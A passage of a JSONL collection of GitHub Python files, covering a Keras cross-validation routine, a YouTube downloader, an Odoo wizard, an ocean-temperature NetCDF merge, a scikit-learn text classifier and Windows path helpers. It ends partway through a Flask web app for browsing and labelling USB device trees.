+{"seq_id":"30976799590","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 8 16:54:29 2021\nThis module defines the function that runs the the neural network model\nand runs a group k-fold cross validation\nThe output is a series of lists with accuracy values and predictor\nimportance of each fold\nUse the shap module for predictor importance\n@author: Javier Muro\n\"\"\"\nfrom sklearn.model_selection import GroupKFold\n#from sklearn import metrics\n\nimport numpy as np\nimport pandas as pd\n#import scipy as sp\n#import tensorflow as tf\n#from tensorflow import keras\nfrom keras.callbacks import EarlyStopping\n#from tensorflow.keras import layers\nfrom tensorflow.keras.layers.experimental import preprocessing\n\nfrom scipy.stats import gaussian_kde\nimport matplotlib.pyplot as plt\n\n\n#Import function to display loss\nfrom plot_loss import plot_loss\n\n#Preprocess data\nimport be_preprocessing \nimport modelDNN\n\n# create list to store results\npred_trues = []\ntestfeatures_order2 = []\n\n\ndef gkfold_DNN(EPOCHS, studyvar):\n # Create an object with the result of the preprocessing module\n Mydataset = be_preprocessing.be_preproc(studyvar)[0]\n\n #Create y (labels) and x (features)\n epg = Mydataset['ep']\n x_columns = Mydataset.columns.drop([studyvar, 'ep'])\n x = Mydataset[x_columns].values\n y = Mydataset[studyvar].values\n \n # K-fold Cross Validation model evaluation\n gkf = GroupKFold(n_splits=5)\n #EPOCHS = 200\n \n fold = 0\n for split, (train, test) in enumerate(gkf.split(x, y, groups=epg)):\n fold+=1\n print(f'Fold#{fold}')\n \n train_features = x[train]\n train_labels = y[train]\n test_features = x[test]\n test_labels = y[test]\n \n # We have to extract the test features in the same order than\n # they are split, so that we can link the predictions to the\n # original dataset\n # This only works if all combinations of training features are unique\n # which is the case (impossible to have identical combinations)\n testfeatures_order= pd.DataFrame(test_features)\n testfeatures_order.columns = x_columns\n testfeatures_order2.append(testfeatures_order)\n \n #######################################################################\n # Normalzation\n #######################################################################\n \n #Create normalizer layer and adapt it to our data\n normalizer = preprocessing.Normalization()\n normalizer.adapt(np.array(train_features))\n \n #######################################################################\n # Important note: the model module is imported outside the loop\n # But the function that builds it is run inside the loop, so that\n # the model is rebuild with each fold.\n # If the model is build outside the loop, it will learn with each fold\n # and we don't want that\n model = modelDNN.build_model(normalizer, train_features)\n #model.summary()\n #######################################################################\n \n #Add an early stopping to avoid overfitting\n es = EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=50)\n \n #Train model\n #Keras fit function expects training features to be as array.\n history = model.fit(\n train_features, \n train_labels, \n epochs=EPOCHS, \n validation_split = 0.2, \n verbose=0\n ,callbacks=[es]\n )\n \n #######################################################################\n #Plot errors\n # Show last few epochs in history\n hist = pd.DataFrame(history.history)\n hist['epoch'] = history.epoch\n \n #plot_loss(history, EPOCHS, studyvar)\n \n #Predictions\n #Make predictions on the test data using the model, and stored results of each fold\n test_predictions = model.predict(test_features).flatten()\n \n \n c = pd.concat([pd.Series(test_labels), pd.Series(test_predictions)], axis=1)\n c.columns = ['labels', 'preds']\n pred_trues.append(c)\n \n yy = c['preds']\n xx = c['labels']\n \n # Calculate the point density\n xxyy = np.vstack([xx,yy])\n z = gaussian_kde(xxyy)(xxyy)\n \n fig, ax = plt.subplots()\n ax.scatter(xx, yy, c=z, s=100)\n \n\n plt.ylabel(f'Predicted {studyvar}')\n plt.xlabel(f'In situ {studyvar}')\n #add a r=1 line\n line = np.array([0,max(Mydataset[studyvar])])\n plt.plot(line,line,lw=1, c=\"black\")\n plt.show() \n \n return model\n \n# if __name__ == \"__main__\":\n# gkfold_DNN(EPOCHS, studyvar)\n\n","repo_name":"Havi-muro/SeBAS_project","sub_path":"gkfold_DNN.py","file_name":"gkfold_DNN.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"}
+{"seq_id":"16011030406","text":"from pytube import YouTube\r\nimport sys\r\n\r\nif len(sys.argv) < 2:\r\n print(\"Usage: python .py \")\r\n sys.exit(1)\r\n\r\nlink = sys.argv[1]\r\nyt = YouTube(link)\r\n\r\nprint(\"Title: \", yt.title)\r\nprint(\"Views: \", yt.views)\r\n\r\nyd = yt.streams.get_highest_resolution()\r\nyd.download(r\"C:\\Users\\Mitko\\Desktop\\videos\")\r\n\r\n#for at køre programmet: terminal: python YoutubeDownloader.py \"youtube link\"\r\n \r\n","repo_name":"RootBeerOverflow/Youtube-video-downloader","sub_path":"YoutubeDownloader.py","file_name":"YoutubeDownloader.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"377716034","text":"from odoo import _, api, fields, models\nfrom odoo.exceptions import UserError, ValidationError\n\n\nclass WizardHolidaysCount(models.TransientModel):\n _name = \"wizard.holidays.count\"\n _description = \"Wizard Report of number of holidays\"\n\n name = fields.Char()\n\n date_from = fields.Date(required=True)\n date_to = fields.Date(required=True)\n\n employee_ids = fields.Many2many(\"hr.employee\")\n\n department_id = fields.Many2one(\"hr.department\", string=\"Department\")\n category_ids = fields.Many2many(\"hr.employee.category\", string=\"Tag\")\n\n @api.model\n def default_get(self, fields):\n res = super().default_get(fields)\n if self.env.user.employee_ids:\n res[\"department_id\"] = self.env.user.employee_ids[0].department_id.id\n return res\n\n def _prepare_employee_domain(self):\n res = []\n if self.category_ids:\n res.append((\"category_ids\", \"in\", self.category_ids.ids))\n if self.department_id:\n res.append((\"department_id\", \"child_of\", self.department_id.id))\n return res\n\n def populate(self):\n domain = self._prepare_employee_domain()\n self.employee_ids = self.env[\"hr.employee\"].search(domain)\n action = self.get_formview_action()\n action[\"target\"] = \"new\"\n return action\n\n def print_report(self):\n self.ensure_one()\n [data] = self.read()\n if not data.get(\"employee_ids\"):\n raise UserError(\n _(\"You have to select at least one Employee. And try again.\")\n )\n datas = {\"ids\": self.ids, \"model\": self._name, \"form\": data}\n return self.env.ref(\n \"cb_number_of_holidays_report.action_report_holidays_count\"\n ).report_action(self, data=datas)\n\n @api.constrains(\"date_from\", \"date_to\")\n def check_date(self):\n for record in self:\n if (\n record.date_from\n and record.date_to\n and record.date_from > record.date_to\n ):\n raise ValidationError(\n _(\"The start date must be anterior to the end date.\")\n )\n","repo_name":"tegin/cb-hr","sub_path":"cb_number_of_holidays_report/wizards/wizard_holidays_count.py","file_name":"wizard_holidays_count.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"74416007663","text":"#!/usr/bin/python3\n\"\"\"Script that displays X-Request-Id variable\"\"\"\n\nfrom sys import argv\nimport requests\n\nif __name__ == \"__main__\":\n\n url = argv[1]\n\n req = requests.get(url)\n head_dict = req.headers\n for key, value in head_dict.items():\n if key == \"X-Request-Id\":\n print(head_dict[key])\n","repo_name":"MDIMACat/alx-higher_level_programming","sub_path":"0x11-python-network_1/5-hbtn_header.py","file_name":"5-hbtn_header.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"6996460","text":"# file to merge data and output?\nimport xarray as xr\nimport numpy as np\nimport scipy.io\nfrom scipy import integrate\nfrom scipy.interpolate import griddata\nimport datetime as dt\nimport time, scipy.io\nimport pandas as pd\nimport pickle\nimport pdb\nfrom netCDF4 import Dataset, date2num, num2date\n#\n# Need to get current time\natime=dt.datetime.now()\n#\n#current_year=2022\ncurrent_year=atime.year\n#current_month=12\ncurrent_month=atime.month\n#\n# deal with case of january\nif current_month==1:\n current_year=current_year-1\n lastmonth=13\nelse:\n lastmonth=current_month\n#\n#nummonth=np.arange(0,lastmonth-1)\nnummonth=np.arange(0,lastmonth)\n#\nmons=['january','february','march','april','may','june','july','august','september','october','november','december']\nabigtime=[]\nabigtemp=[]\nfor i in nummonth:\n fname='/home/flbahr/heat_content/wcofs_'+mons[i]+'_'+str(current_year)+'.p'\n thefile=open(fname,'rb')\n [time,temp]=pickle.load(thefile)\n if i==0:\n abigtime=time\n abigtemp=temp\n else:\n abigtime=np.append(abigtime,time)\n abigtemp=np.vstack((abigtemp,temp))\n#\n# this is just to load the latitude and longitude arrays so year can be hard coded.\nroms_ds=xr.open_dataset('/home/flbahr/heat_content/WCOFS_SST_2022.nc',decode_cf=True)\nlat=roms_ds['lat']\nlon=roms_ds['lon']\nlatitude=lat\nlongitude=lon\n#\nstring_year=str(current_year)\ndims=['time','lat','lon']\nds=xr.Dataset({'wcofs_temperature':(dims,abigtemp)},\n coords={'time':abigtime,\n 'lon':longitude,\n 'lat':latitude,\n })\nds.attrs['title']='WCOFS SST UCSC ROMS grid '+string_year\nds.attrs['notes']=\"Created on \"+dt.datetime.today().strftime(\"%&-%m-%d\")+\" by flbahr, interpolated onto UCSC grid\"\nfname=\"/home/flbahr/heat_content/WCOFS_SST_\"+string_year+\".nc\"\nds.to_netcdf(path=fname)\n","repo_name":"CeNCOOS/UCSC-WCROMS-Heat-Wave","sub_path":"wcof_merge_data.py","file_name":"wcof_merge_data.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"21036673932","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom .base_model_ import Model\nfrom datetime import date, datetime\nfrom typing import List, Dict\nfrom ..util import deserialize_model\n\n\nclass Body(Model):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n def __init__(self, favorite: bool=None):\n \"\"\"\n Body - a model defined in Swagger\n\n :param favorite: The favorite of this Body.\n :type favorite: bool\n \"\"\"\n self.swagger_types = {\n 'favorite': bool\n }\n\n self.attribute_map = {\n 'favorite': 'favorite'\n }\n\n self._favorite = favorite\n\n @classmethod\n def from_dict(cls, dikt) -> 'Body':\n \"\"\"\n Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The body of this Body.\n :rtype: Body\n \"\"\"\n return deserialize_model(dikt, cls)\n\n @property\n def favorite(self) -> bool:\n \"\"\"\n Gets the favorite of this Body.\n\n :return: The favorite of this Body.\n :rtype: bool\n \"\"\"\n return self._favorite\n\n @favorite.setter\n def favorite(self, favorite: bool):\n \"\"\"\n Sets the favorite of this Body.\n\n :param favorite: The favorite of this Body.\n :type favorite: bool\n \"\"\"\n if favorite is None:\n raise ValueError(\"Invalid value for `favorite`, must not be `None`\")\n\n self._favorite = favorite\n\n","repo_name":"saintaxl/swaggy-jenkins","sub_path":"clients/python-flask/generated/swagger_server/models/body.py","file_name":"body.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"91"}
+{"seq_id":"14407580664","text":"\n# coding: utf-8\n\n# In[13]:\n\n# Taken directly from http://stackoverflow.com/questions/10526579/use-scikit-learn-to-classify-into-multiple-categories\nimport numpy as np\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.svm import LinearSVC\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn import preprocessing\n\n\n# In[3]:\n\nX_train = np.array([\"new york is a hell of a town\",\n \"new york was originally dutch\",\n \"the big apple is great\",\n \"new york is also called the big apple\",\n \"nyc is nice\",\n \"people abbreviate new york city as nyc\",\n \"the capital of great britain is london\",\n \"london is in the uk\",\n \"london is in england\",\n \"london is in great britain\",\n \"it rains a lot in london\",\n \"london hosts the british museum\",\n \"new york is great and so is london\",\n \"i like london better than new york\"])\n\n\n# In[4]:\n\ny_train = [[0],[0],[0],[0],[0],[0],[1],[1],[1],[1],[1],[1],[0,1],[0,1]]\n\n\n# In[5]:\n\nX_test = np.array(['nice day in nyc',\n 'welcome to london',\n 'hello welcome to new york. enjoy it here and london too'])\n\n\n# In[6]:\n\ntarget_names = ['New York', 'London']\n\n\n# In[9]:\n\nclassifier = Pipeline([\n ('vectorizer', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', OneVsRestClassifier(LinearSVC()))])\n\n\n# In[10]:\n\nclassifier.fit(X_train, y_train)\npredicted = classifier.predict(X_test)\n\n\n# In[11]:\n\nfor item, labels in zip(X_test, predicted):\n print('%s => %s' % (item, ', '.join(target_names[x] for x in labels)))\n\n","repo_name":"emgrasmeder/datascience-pres","sub_path":"classification_intro.py","file_name":"classification_intro.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"91"}
+{"seq_id":"25781591916","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\n# Hive Administration Scripts\r\n# Copyright (c) 2008-2020 Hive Solutions Lda.\r\n#\r\n# This file is part of Hive Administration Scripts.\r\n#\r\n# Hive Administration Scripts is free software: you can redistribute it and/or modify\r\n# it under the terms of the Apache License as published by the Apache\r\n# Foundation, either version 2.0 of the License, or (at your option) any\r\n# later version.\r\n#\r\n# Hive Administration Scripts is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# Apache License for more details.\r\n#\r\n# You should have received a copy of the Apache License along with\r\n# Hive Administration Scripts. If not, see .\r\n\r\n__author__ = \"João Magalhães \"\r\n\"\"\" The author(s) of the module \"\"\"\r\n\r\n__version__ = \"1.0.0\"\r\n\"\"\" The version of the module \"\"\"\r\n\r\n__revision__ = \"$LastChangedRevision$\"\r\n\"\"\" The revision number of the module \"\"\"\r\n\r\n__date__ = \"$LastChangedDate$\"\r\n\"\"\" The last change date of the module \"\"\"\r\n\r\n__copyright__ = \"Copyright (c) 2008-2020 Hive Solutions Lda.\"\r\n\"\"\" The copyright for the module \"\"\"\r\n\r\n__license__ = \"Apache License, Version 2.0\"\r\n\"\"\" The license for the module \"\"\"\r\n\r\nimport os\r\nimport sys\r\n\r\nimport legacy\r\n\r\nNT_PLATFORM = \"nt\"\r\n\"\"\" The nt platform reference string value to be\r\nused in operative system detection \"\"\"\r\n\r\nDOS_PLATFORM = \"dos\"\r\n\"\"\" The dos platform used as a fallback reference\r\nvalue for operation system detection mechanisms \"\"\"\r\n\r\nWINDOWS_PLATFORMS = (NT_PLATFORM, DOS_PLATFORM)\r\n\"\"\" The windows platform values that may be used\r\nto detect any environment running any version of windows \"\"\"\r\n\r\nLONG_PATH_PREFIX = legacy.UNICODE(\"\\\\\\\\?\\\\\")\r\n\"\"\" The windows long path prefix, used for special\r\nconstruction of path values in windows \"\"\"\r\n\r\nIGNORE_FILE = \".cignore\"\r\n\"\"\" The name of the file that is going to be used to determine\r\nif a path tree should be ignored and no operation should be\r\nperformed for any of its children \"\"\"\r\n\r\ndef handle_ignore(names):\r\n \"\"\"\r\n Tries to handle the ignore operation for the provided\r\n set of names, this should include the changing of the\r\n names list in case its required.\r\n\r\n :type names: List\r\n :param names: The list of directory names that are meant\r\n to be verified/handled for the ignore file.\r\n :rtype: bool\r\n :return: If the ignore operation has been processed for\r\n the current list of names.\r\n \"\"\"\r\n\r\n if not IGNORE_FILE in names: return False\r\n del names[:]\r\n return True\r\n\r\ndef normalize_path(path):\r\n \"\"\"\r\n Normalizes the given path, using the characteristics\r\n of the current environment.\r\n\r\n In windows this function adds support for long path names\r\n as defined in windows specification.\r\n\r\n :type path: String\r\n :param path: The path (to file) value that is going to\r\n be returned as normalized.\r\n :rtype: String\r\n :return: The normalized path, resulting from a series of\r\n normalization processes applied to the \"original\" path.-\r\n \"\"\"\r\n\r\n # retrieves the current os name, as it's going to be used\r\n # to determine if windows normalization should be applied\r\n os_name = os.name\r\n\r\n # in case the current operative system is windows based and\r\n # the normalized path does start with the long path prefix it\r\n # must be removed to allow a \"normal\" path normalization\r\n if os_name in WINDOWS_PLATFORMS and path.startswith(LONG_PATH_PREFIX):\r\n # removes the long path prefix from the path\r\n path = path[4:]\r\n\r\n # checks if the path is absolute, as it will be used to determine\r\n # if the path should be normalized as absolute or not\r\n is_absolute_path = os.path.isabs(path)\r\n\r\n # in case the path is not absolute (creates problem in windows\r\n # long path support)\r\n if os_name in WINDOWS_PLATFORMS and not is_absolute_path:\r\n # converts the path to absolute\r\n path = os.path.abspath(path)\r\n\r\n # normalizes the path, using the underlying python function\r\n # that provided simple normalization process\r\n normalized_path = os.path.normpath(path)\r\n\r\n # in case the current operative system is windows based and\r\n # the normalized path does not start with the long path prefix\r\n if os_name in WINDOWS_PLATFORMS and not normalized_path.startswith(LONG_PATH_PREFIX):\r\n # creates the path in the windows mode, adds\r\n # the support for long path names with the prefix token\r\n normalized_path = LONG_PATH_PREFIX + normalized_path\r\n\r\n # returns the \"final\" normalized path value resulting from\r\n # the various normalization processes applied to original path\r\n return normalized_path\r\n\r\ndef configuration(file_path = None, **kwargs):\r\n \"\"\"\r\n Retrieves the configuration map(s) for the given arguments,\r\n the keyword based arguments are used as the configuration\r\n in case no valid configuration file exits (fallback).\r\n\r\n :type file_path: String\r\n :param file_path: The path to the file that is going to be\r\n processed as the configuration file in context.\r\n :rtype: Dictionary\r\n :return: The configuration structure/map, taking into account\r\n the current location structure.\r\n \"\"\"\r\n\r\n # in case the configuration file path is defined, meaning that\r\n # a configuration file is expected to be loaded\r\n if file_path:\r\n # retrieves the configuration directory from the configuration\r\n # file path (the directory is going to be used to include the module)\r\n directory_path = os.path.dirname(file_path)\r\n directory_path = os.path.abspath(directory_path)\r\n\r\n # in case the (configuration directory) path is valid inserts it into the\r\n # system path, so that it's possible to load python files from it\r\n directory_path and sys.path.insert(0, directory_path)\r\n\r\n # retrieves the configuration file base path from the configuration file path\r\n file_base_path = os.path.basename(file_path)\r\n\r\n # retrieves the configuration module name and the configuration module extension\r\n # by splitting the configuration base path into base name and extension\r\n module_name, _module_extension = os.path.splitext(file_base_path)\r\n\r\n # imports the configuration module and retrieves the configurations\r\n # variable containing the \"final\" configuration structure\r\n configuration = __import__(module_name)\r\n configurations = configuration.configurations\r\n\r\n # otherwise the provided arguments (through keyword) are going to be used\r\n # as the basis for the creation of the configurations\r\n else:\r\n # creates the configurations tuple with the base configurations\r\n # coming from the keyword based arguments (as expected)\r\n configurations = (kwargs,)\r\n\r\n return configurations\r\n","repo_name":"hivesolutions/admin-scripts","sub_path":"src/admin_scripts/extra/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":6955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"1644181648","text":"import json\nimport logging\nfrom datetime import datetime\nfrom http import HTTPStatus\n\nimport astutus.usb\nimport flask\nimport flask.logging\n\nlogger = logging.getLogger(__name__)\n\nusb_page = flask.Blueprint('usb', __name__, template_folder='templates')\n\n\ndef get_alias_path_item_list():\n aliases = astutus.usb.device_aliases.DeviceAliases(filepath=None)\n alias_by_resolved_name = {}\n for key, alias in aliases.items():\n logger.debug(f\"alias: {alias}\")\n # Need to have a good name for display. For now just use description template\n # if the name is not defined. Long term, need to make sure name is defined\n # and unique.\n resolved_name = alias.get('name', alias['description_template'])\n while True:\n if resolved_name not in alias_by_resolved_name:\n alias_by_resolved_name[resolved_name] = {'value': alias['pattern'], 'link_text': resolved_name}\n break\n else:\n resolved_name += \"+\"\n # Sort before returning list.\n items_list = []\n sorted_keys = sorted([key for key in alias_by_resolved_name.keys()])\n for key in sorted_keys:\n items_list.append(alias_by_resolved_name[key])\n return items_list\n\n\ndef get_config_items_list():\n device_configurations = astutus.usb.DeviceConfigurations()\n items_list = []\n for config in device_configurations.items():\n items_list.append({'value': config.idx, 'link_text': config.name})\n return items_list\n\n\n@usb_page.route('/astutus/app/usb/index.html', methods=['GET'])\ndef handle_usb():\n if flask.request.method == 'GET':\n links_list = [\n '
')\n return '\\n' + '\\n'.join(lines)\n\n\n@usb_page.route('/astutus/app/usb/label/sys/', methods=['PUT'])\ndef handle_label(path):\n # Intent is to get JSON here, rather than form data.\n # logger.info(f\"flask.request.data: {flask.request.data}\")\n # logger.info(f\"flask.request.headers: {flask.request.headers}\")\n # logger.info(f\"flask.request.is_json: {flask.request.is_json}\")\n if flask.request.is_json:\n request_data = flask.request.get_json(force=True)\n logger.debug(f\"request_data: {request_data}\")\n # logger.info(f\"request_data.get('alias'): {request_data.get('alias')}\")\n alias = request_data.get('alias')\n sys_devices_path = '/sys/' + path\n data = request_data.get('data')\n # TODO: Pass configuration from web page. Maybe security risk. Need to consider protection from\n # running arbitrary code.\n config_data = request_data.get('device_config')\n if config_data is not None:\n device_config = astutus.usb.DeviceConfiguration(config_data)\n else:\n if data.get('ilk') == 'pci':\n device_config = astutus.usb.DeviceConfigurations.make_pci_configuration(data)\n elif data.get('ilk') == 'usb':\n device_config = astutus.usb.DeviceConfigurations.make_generic_usb_configuration(data)\n elif data.get('ilk') == 'other':\n device_config = astutus.usb.DeviceConfigurations.make_generic_other_configuration(data)\n else:\n raise NotImplementedError(f\"Unhandled ilk: {data.get('ilk')}\")\n logger.debug(f\"device_config: {device_config}\")\n node_data = astutus.usb.tree.get_node_data(data, device_config, alias)\n logger.debug(f\"node_data: {node_data}\")\n result = {\n 'html_label': node_data.get('html_label'),\n 'sys_devices_path': sys_devices_path,\n 'node_data': node_data,\n }\n return result, HTTPStatus.OK\n\n\n@usb_page.route('/astutus/app/usb/sys/', methods=['GET', 'PATCH', 'PUT'])\ndef handle_device_tree_item(path):\n logger.info('Start handle_device_tree_item')\n sys_devices_path = '/sys/' + path\n logger.debug(f'sys_devices_path: {sys_devices_path}')\n if sys_devices_path == '/sys/devices':\n data = {\n 'data_for_dir': {\n 'node_id': 'other(devices)',\n 'top_of_tree': True,\n 'dirpath': '/sys/devices',\n 'dirname': 'devices',\n 'ilk': 'other',\n },\n }\n return data, HTTPStatus.OK\n request_data = flask.request.get_json(force=True)\n pci_device_info_arg = request_data.get('pciDeviceInfo')\n logger.debug(f'pci_device_info_arg: {pci_device_info_arg}')\n if path == 'devices/pci0000:00':\n pci_device_info = None\n ilk = \"other\"\n elif pci_device_info_arg == \"Nothing!\":\n pci_device_info = None\n ilk = \"usb\"\n else:\n pci_device_info = json.loads(pci_device_info_arg.replace(\"'\", '\"'))\n ilk = \"pci\"\n data = astutus.usb.tree.get_data_for_dirpath(ilk, sys_devices_path, pci_device_info)\n data_for_return = {\n 'data_for_dir': data,\n }\n return data_for_return, HTTPStatus.OK\n\n\n@usb_page.route('/astutus/app/usb/device_tree.html', methods=['GET', 'POST'])\ndef handle_usb_device():\n if flask.request.method == 'GET':\n begin = datetime.now()\n logger.info(\"Start device tree data creation\")\n pci_device_info_map = astutus.util.pci.get_slot_to_device_info_map_from_lspci()\n logger.debug(f\"pci_device_info_map: {pci_device_info_map}\")\n device_tree = astutus.usb.UsbDeviceTree(basepath=None, device_aliases_filepath=None)\n device_configurations = astutus.usb.DeviceConfigurations()\n bare_tree_dict = device_tree.execute_tree_cmd(to_bare_tree=True)\n bare_tree_html = tree_to_html(bare_tree_dict, pci_device_info_map)\n aliases = astutus.usb.device_aliases.DeviceAliases(filepath=None)\n background_color = astutus.util.get_setting('/astutus/app/usb/settings', 'background_color', \"#fcfcfc\")\n delta = datetime.now() - begin\n logger.info(f\"Start rendering template for device tree. Generation time: {delta.total_seconds()}\")\n\n return flask.render_template(\n 'app/usb/styled_device_tree.html',\n bare_tree=bare_tree_html,\n aliases_javascript=aliases.to_javascript(),\n configurations_javascript=device_configurations.to_javascript(),\n tree_html=None,\n tree_html_background_color=background_color)\n if flask.request.method == 'POST':\n form = flask.request.form\n if form.get(\"action\") == \"add_or_update_alias\":\n logger.info(\"Handle add_or_update_alias\")\n nodepath = form.get('nodepath')\n logger.debug(f\"nodepath: {nodepath}\")\n template = form.get('template')\n logger.debug(f\"template: {template}\")\n color = form.get('color')\n logger.debug(f\"color: {color}\")\n name = form.get('name')\n if name is None:\n name = nodepath\n aliases = astutus.usb.device_aliases.DeviceAliases(filepath=None)\n aliases[nodepath] = {\n \"name\": name,\n \"color\": f\"{color}\",\n \"description_template\": f\"{template}\",\n \"order\": \"00\",\n \"priority\": 50\n }\n astutus.usb.device_aliases.DeviceAliases.write_raw_as_json(filepath=None, raw_aliases=aliases)\n return flask.redirect(flask.url_for('usb.handle_usb_device'))\n return \"Unhandled post\", HTTPStatus.NOT_IMPLEMENTED\n\n\n@usb_page.route('/astutus/app/usb/alias.html', methods=['GET'])\ndef handle_usb_alias():\n if flask.request.method == 'GET':\n aliases = astutus.usb.device_aliases.DeviceAliases(filepath=None)\n return flask.render_template(\n 'app/usb/styled_alias.html',\n aliases=aliases,\n nodepath_item_list=get_alias_path_item_list())\n\n\n@usb_page.route('/astutus/app/usb/alias//index.html', methods=['GET', \"DELETE\", \"POST\"])\ndef handle_usb_alias_item(nodepath):\n if flask.request.method == 'GET':\n item = {\n 'id': nodepath,\n }\n aliases = astutus.usb.device_aliases.DeviceAliases(filepath=None)\n alias = aliases.get(nodepath)\n if alias is not None:\n return flask.render_template(\n 'app/usb/alias/nodepath/styled_index.html',\n item=item,\n nodepath=nodepath,\n alias=alias,\n nodepath_item_list=get_alias_path_item_list())\n return f\"No alias for {nodepath} found.\", HTTPStatus.BAD_REQUEST\n if flask.request.method == 'DELETE':\n logger.debug(f\"Delete the item now: {nodepath}\")\n aliases = astutus.usb.device_aliases.DeviceAliases(filepath=None)\n logger.debug(f\"aliases: {aliases}\")\n del aliases[nodepath]\n logger.debug(f\"After deletion: aliases: {aliases}\")\n aliases.write(filepath=None)\n logger.debug(f\"After write: aliases: {aliases}\")\n data = {\n \"redirect_url\": \"/astutus/app/usb/alias.html\"\n }\n return data, HTTPStatus.ACCEPTED\n if flask.request.method == 'POST':\n form = flask.request.form\n name = form.get('name')\n pattern = form.get('pattern')\n template = form.get('template')\n color = form.get('color')\n order = form.get('order')\n priority = form.get('priority')\n alias = {\n 'name': name,\n 'pattern': pattern,\n 'description_template': template,\n 'color': color,\n 'order': order,\n 'priority': priority\n }\n logger.info(f\"alias: {alias}\")\n original_pattern = form.get('original_pattern')\n aliases = astutus.usb.device_aliases.DeviceAliases(filepath=None)\n del aliases[original_pattern]\n aliases[pattern] = alias\n aliases.write(filepath=None)\n return flask.redirect(flask.url_for('usb.handle_usb_alias'))\n\n\n@usb_page.route('/astutus/app/usb/configuration.html', methods=['GET'])\ndef handle_usb_configuration():\n if flask.request.method == 'GET':\n device_configurations = astutus.usb.DeviceConfigurations()\n logger.debug(f\"device_configurations: {device_configurations}\")\n return flask.render_template(\n 'app/usb/styled_device_id.html',\n device_configurations=device_configurations,\n nodeid_item_list=get_config_items_list())\n\n\n@usb_page.route('/astutus/app/usb/configuration//index.html', methods=['GET'])\ndef handle_usb_configuration_item(nodeid):\n if flask.request.method == 'GET':\n device_configurations = astutus.usb.DeviceConfigurations()\n device_config = device_configurations.get_item(nodeid)\n return flask.render_template(\n 'app/usb/device_id/nodeid/styled_index.html',\n item=nodeid,\n nodeid=nodeid,\n device_config=device_config,\n nodeid_item_list=get_config_items_list())\n\n\n@usb_page.route('/astutus/app/usb/settings', methods=['GET', 'PATCH'])\ndef handle_usb_settings():\n if flask.request.method == 'GET':\n return \"Should return settings here\", HTTPStatus.NOT_IMPLEMENTED\n if flask.request.method == 'PATCH':\n request_data = flask.request.get_json(force=True)\n background_color = request_data.get('background-color')\n if background_color is not None:\n logger.info(f\"background_color: {background_color}\")\n astutus.util.persist_setting('/astutus/app/usb/settings', 'background_color', background_color)\n return \"Setting persisted\", HTTPStatus.OK\n return \"Need to persist settings here\", HTTPStatus.NOT_IMPLEMENTED\n\n\n@usb_page.route('/astutus/app/usb/device//index.html', methods=['GET'])\ndef handle_usb_device_item(nodepath):\n if flask.request.method == 'GET':\n sys_devices_path = flask.request.args.get('sys_device_path')\n sys_devices_path += '/' # to pick up last element\n device_paths = []\n idx = 5\n while idx > 0:\n idx = sys_devices_path.find('/', idx + 1)\n if idx > 0:\n device_paths.append(sys_devices_path[:idx])\n logger.debug(f\"device_paths: {device_paths}\")\n node_data_searcher = astutus.usb.NodeDataSearcher()\n node_data_list = []\n for device_path in device_paths:\n node_data_list.append(node_data_searcher.get_node_data(device_path))\n\n extra_fields_for_ilk = {\n 'usb': ['nodepath', 'vendor', 'product_text', 'device_class'],\n 'pci': ['nodepath'],\n }\n device_classifier = astutus.usb.DeviceClassifier(expire_seconds=10)\n device_data_list = []\n for device_path in device_paths:\n device_data = device_classifier.get_device_data(device_path)\n extra_fields = extra_fields_for_ilk.get(device_data['ilk'])\n if extra_fields is not None:\n device_data = device_classifier.get_device_data(device_path, extra_fields)\n device_data_list.append(device_data)\n\n extra_fields_for_node_id = {\n 'usb(046d:c52b)': ['logitech_unifying_receiver_input_type'],\n }\n for device_path in device_paths:\n device_data = device_classifier.get_device_data(device_path)\n extra_fields = extra_fields_for_node_id.get(device_data['node_id'])\n if extra_fields is not None:\n device_classifier.get_device_data(device_path, extra_fields)\n rules = [\n {\n 'checks': [\n {'field': 'ilk', 'equals': 'usb'},\n {'field': 'node_id', 'equals': 'usb(1a86:7523)'},\n {'field': 'nodepath', 'contains': 'usb(05e3:0610)'},\n ],\n 'extra_fields': ['tty'],\n 'template': '{color_purple} {vendor} {product_text} {tty} {end_color}'\n },\n {\n 'checks': [\n {'field': 'ilk', 'equals': 'usb'},\n {'field': 'node_id', 'equals': 'usb(1a86:7523)'},\n ],\n 'extra_fields': ['tty'],\n 'template': '{color_for_usb} {vendor} {product_text} {tty} {end_color}'\n },\n {\n 'checks': [{'field': 'ilk', 'equals': 'pci'}],\n 'template': '{color_for_pci} {vendor} {product_text} {end_color}'\n },\n {\n 'checks': [{'field': 'ilk', 'equals': 'usb'}],\n 'template': '{color_for_usb} {vendor} {product_text} 